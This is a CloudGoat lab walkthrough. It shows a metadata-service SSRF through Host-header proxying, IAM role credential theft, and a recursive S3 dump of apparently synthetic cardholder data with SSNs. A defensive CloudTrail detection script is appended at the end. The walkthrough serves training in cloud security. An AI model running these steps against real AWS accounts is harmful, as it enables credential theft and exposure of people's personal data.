CloudGoat: cloud_breach_s3

Note: We will be performing our attack via Kali Linux. Ensure you have completed the prerequisites before you start the lab.

1. Preparation

1.1 Launch the scenario:

┌──(root㉿kali)-[~]
└─# cd /opt/cloudgoat

┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py create cloud_breach_s3

2. Enumerate the IP address

2.1 Nmap

┌──(root㉿kali)-[/opt/cloudgoat]
└─# nmap -p- -sV 3.91.223.35 --min-rate=1000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-09 21:22 EDT
Nmap scan report for xxxx.compute-1.amazonaws.com (3.91.223.35)
Host is up (0.000090s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE    VERSION
22/tcp open  tcpwrapped
80/tcp open  tcpwrapped

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.04 seconds

2.2 HTTP

┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35
<h1>This server is configured to proxy requests to the EC2 metadata service.
Please modify your request's 'host' header and try again.</h1>

┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35 -H host:169.254.169.254
1.0
2007-01-19
2007-03-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
2008-09-01
2009-04-04
2011-01-01
2011-05-01
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
2018-03-28
2018-08-17
2018-09-24
2019-10-01
2020-10-27
2021-01-03
2021-03-23
2021-07-15
2022-07-09
2022-09-24
2024-04-11
latest

┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35/latest -H host:169.254.169.254
dynamic
meta-data
user-data

┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35/latest/meta-data -H host:169.254.169.254
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hibernation/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/
system

┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35/latest/meta-data/iam -H host:169.254.169.254
info
security-credentials/

┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35/latest/meta-data/iam/security-credentials -H host:169.254.169.254
cg-banking-WAF-Role-cloud_breach_s3_cgidtgnnrs1qrc

┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cloud_breach_s3_cgidtgnnrs1qrc -H host:169.254.169.254
{
  "Code" : "Success",
  "LastUpdated" : "2024-05-10T01:13:54Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "xxxaaa",
  "SecretAccessKey" : "xxxbbb",
  "Token" : "xxxccc",
  "Expiration" : "2024-05-10T07:49:07Z"
}

2.3 Create profile

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws configure --profile s3new01
AWS Access Key ID [None]: xxxaaa
AWS Secret Access Key [None]: xxxbbb
Default region name [None]:
Default output format [None]:

┌──(root㉿kali)-[/opt/cloudgoat]
└─# mousepad ~/.aws/credentials

┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat ~/.aws/credentials
[CloudGoat]
...
...
...
[s3new01]
aws_access_key_id = xxxaaa
aws_secret_access_key = xxxbbb
aws_session_token = xxxccc

3. Enumerate the S3 bucket

3.1 List all user-owned S3 buckets

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws s3 ls --profile s3new01
2024-05-09 21:13:42 cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc

3.2 List all prefixes and objects in a bucket

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws s3 ls s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc --profile s3new01
2024-05-09 21:13:47      58872 cardholder_data_primary.csv
2024-05-09 21:13:48      59384 cardholder_data_secondary.csv
2024-05-09 21:13:48      92165 cardholders_corporate.csv
2024-05-09 21:13:49     249500 goat.png

3.3 Recursively copy S3 objects to another location locally

┌──(root㉿kali)-[/opt/cloudgoat]
└─# mkdir s3_dump

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws s3 cp --recursive 's3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc' s3_dump/ --profile s3new01
download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc/cardholder_data_secondary.csv to s3_dump/cardholder_data_secondary.csv
download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc/cardholder_data_primary.csv to s3_dump/cardholder_data_primary.csv
download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc/cardholders_corporate.csv to s3_dump/cardholders_corporate.csv
download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc/goat.png to s3_dump/goat.png

┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd s3_dump

┌──(root㉿kali)-[/opt/cloudgoat/s3_dump]
└─# ls
cardholder_data_primary.csv  cardholder_data_secondary.csv  cardholders_corporate.csv  goat.png

┌──(root㉿kali)-[/opt/cloudgoat/s3_dump]
└─# cat cardholder_data_primary.csv
ssn,id,first_name,last_name,email,gender,ip_address,address,city,state,zip
287-43-8531,1,Cooper,Luffman,cluffman0@nifty.com,Male,194.222.101.195,2 Killdeer Way,Atlanta,Georgia,30343
892-80-0931,2,Grata,Pulteneye,gpulteneye1@taobao.com,Female,161.4.88.129,486 Butterfield Crossing,Washington,District of Columbia,20503
502-50-6643,3,Rogerio,Glover,rglover2@nps.gov,Male,88.58.129.152,3 Granby Circle,Sacramento,California,94280

4. Clean up

┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py destroy cloud_breach_s3

┌──(root㉿kali)-[/opt/cloudgoat]
└─# rm -r s3_dump
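
How sections 2.2 to 3.3 look from the defender's side, as an added example that is not part of the original walkthrough: the role credentials read from the metadata service belong to the EC2 instance, so any CloudTrail record that shows that role session calling AWS from an address other than the instance's own is the signal to alert on. The account ID, instance ID, private IP, caller address 203.0.113.50 and the inventory mapping are constructed placeholders; the role name and 3.91.223.35 are taken from the lab output above.

```python
import ipaddress
import re

# Instance-profile sessions are named after the instance ID, so the ARN ends
# in .../assumed-role/<role-name>/i-<hex>.
INSTANCE_SESSION = re.compile(r":assumed-role/([^/]+)/(i-[0-9a-f]{8,17})$")

def find_offhost_role_use(events, instance_ips):
    """Flag CloudTrail records where an EC2 role session is used from an
    address that does not belong to the instance named in the session."""
    findings = []
    for ev in events:
        ident = ev.get("userIdentity", {})
        match = INSTANCE_SESSION.search(ident.get("arn", ""))
        if ident.get("type") != "AssumedRole" or not match:
            continue
        role, instance = match.groups()
        try:
            src = str(ipaddress.ip_address(ev.get("sourceIPAddress", "")))
        except ValueError:
            continue  # calls made by AWS services carry a hostname here
        if src not in instance_ips.get(instance, set()):
            findings.append((ev["eventName"], role, instance, src))
    return findings

# Constructed sample data. The role name and 3.91.223.35 come from the
# walkthrough; account ID, instance ID and 203.0.113.50 are placeholders.
ROLE = "cg-banking-WAF-Role-cloud_breach_s3_cgidtgnnrs1qrc"
ARN = f"arn:aws:sts::111122223333:assumed-role/{ROLE}/i-0123456789abcdef0"
SESSION = {"type": "AssumedRole", "arn": ARN}
INVENTORY = {"i-0123456789abcdef0": {"3.91.223.35", "10.0.10.25"}}
SAMPLE_EVENTS = [
    {"eventName": "DescribeInstances", "sourceIPAddress": "3.91.223.35", "userIdentity": SESSION},
    {"eventName": "ListBuckets", "sourceIPAddress": "203.0.113.50", "userIdentity": SESSION},
    # GetObject is only recorded when S3 data events are enabled on the trail.
    {"eventName": "GetObject", "sourceIPAddress": "203.0.113.50", "userIdentity": SESSION},
    {"eventName": "ListBuckets", "sourceIPAddress": "203.0.113.50",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/analyst"}},
    {"eventName": "Decrypt", "sourceIPAddress": "ec2.amazonaws.com", "userIdentity": SESSION},
]

if __name__ == "__main__":
    for finding in find_offhost_role_use(SAMPLE_EVENTS, INVENTORY):
        print("role credentials used off-instance:", finding)
```

In a real account the inventory must also include any NAT gateway or VPC endpoint addresses the instance legitimately egresses through, otherwise normal traffic is flagged.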